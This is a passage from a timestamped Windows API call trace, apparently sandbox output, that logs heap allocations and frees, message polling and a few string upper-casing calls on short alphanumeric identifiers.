out: hHeap=0x25c0000) returned 1 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.589] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0265.590] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0265.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0265.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.591] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.591] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.592] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.592] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.593] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.593] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.594] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.594] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.595] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.595] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0265.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0265.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.597] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.597] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.597] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.598] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0265.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0265.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0265.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0265.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.601] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.601] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.601] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: 